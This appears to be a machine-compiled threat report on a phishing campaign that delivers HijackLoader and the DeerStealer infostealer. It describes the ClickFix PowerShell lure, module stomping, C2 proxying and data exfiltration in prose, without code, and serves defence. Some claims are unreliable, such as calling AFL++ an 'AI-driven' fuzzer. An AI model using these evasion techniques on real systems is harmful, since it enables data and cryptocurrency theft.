Introduction
A recent surge in cyber-attacks has been identified, involving the sophisticated malware duo HijackLoader and DeerStealer [2]. These attacks employ advanced phishing tactics to deceive victims into executing harmful commands, posing a significant threat to cybersecurity.
Description
A new wave of cyber-attacks has been observed involving the malware duo HijackLoader and DeerStealer, which utilize sophisticated phishing tactics to lure victims into executing malicious commands [3]. Discovered by eSentire’s Threat Response Unit (TRU) [1], these campaigns employ ClickFix as the initial access vector [1] [3], redirecting victims to phishing pages that instruct them to run a PowerShell command via the Windows Run prompt [1] [2] [3]. This command downloads a malicious installer named now.msi [2] [3], which is executed via msiexec.exe and leads to the activation of HijackLoader, ultimately releasing the DeerStealer payload [3].
HijackLoader [1] [2] [3] [4], first observed in 2023 [2], is known for employing advanced techniques such as steganography to hide encrypted configurations within PNG images. Once activated [1], it exploits legitimate binaries to run unsigned malicious code [1] [3], utilizing module stomping to inject payloads into signed binaries and performing dynamic API resolution with custom hashing algorithms [2]. The loader decrypts its second stage from files like Bairrout.xd using hardcoded offsets and cryptographic methods [2]. It then performs module stomping on input.dll and launches a renamed Q-Dir binary to execute the final payload [2], DeerStealer [1] [2] [3] [4].
DeerStealer [1] [2] [3] [4], marketed on dark-web forums as XFiles Spyware, is a subscription-based infostealer that extracts data from over 800 browser extensions [3], desktop wallets [2], VPNs [2], gaming clients [2] [3] [4], email applications [2] [3], and RDP clients [2]. It hijacks over 14 types of cryptocurrency wallets through clipboard monitoring and features hidden VNC for stealthy remote access. Subscription prices range from $200 to $3000 per month [2], with higher-tier offerings providing advanced features such as re-encryption, payload signing [3], and AI-driven enhancements [3].
Communication with its command and control (C2) server occurs via encrypted HTTPS channels, utilizing a proxy system named “Gasket” to obscure the true server IPs [2]. Initial check-ins fingerprint the host using Windows installation date/time [2], GUIDs [2], and CPU names [2], while encrypted ZIP files are employed for data exfiltration [2]. The campaign is particularly dangerous due to its evasion tactics [2], which include bypassing email-based security [2], abusing Living Off the Land Binaries (LOLBin) with curl.exe and msiexec.exe [2], and employing modular obfuscation that complicates static analysis. The emergence of these AI-driven malware variants signifies a significant shift in the threat landscape [4], as they operate at scale and pose a serious challenge to cybersecurity measures [4]. Despite the availability of HijackLoader extractors [2], threat actors appear undeterred [2], indicating either negligence or confidence in their ability to remain undetected [2]. Penetration testers are advised to employ AI-driven fuzzers like AFL++ to identify vulnerabilities that such malware might exploit [4], use Cobalt Strike for simulating AI malware evasion techniques [4], and train clients to monitor for unusual network traffic [4], as AI malware often leaves subtle traces [4].
Conclusion
The emergence of HijackLoader and DeerStealer represents a significant evolution in cyber threats, leveraging advanced techniques and AI-driven capabilities. These developments underscore the need for enhanced cybersecurity measures, including the use of AI-driven tools for vulnerability detection and simulation of evasion techniques. Organizations must remain vigilant, continuously updating their defenses and training personnel to recognize and respond to these sophisticated threats. The ongoing adaptation and resilience of threat actors highlight the importance of proactive and innovative approaches to cybersecurity.
References
[1] https://www.infosecurity-magazine.com/news/hijackloader-deerstealer-target/
[2] https://securityonline.info/new-malware-duo-hijackloader-deerstealer-surge-bypassing-defenses-for-data-theft/
[3] https://trustcrypt.com/ar/threat-actors-exploit-hijackloader-and-deerstealer-to-compromise-victims/
[4] https://pentestpro07.blogspot.com/2025/06/cracking-todays-cyber-chaos.html
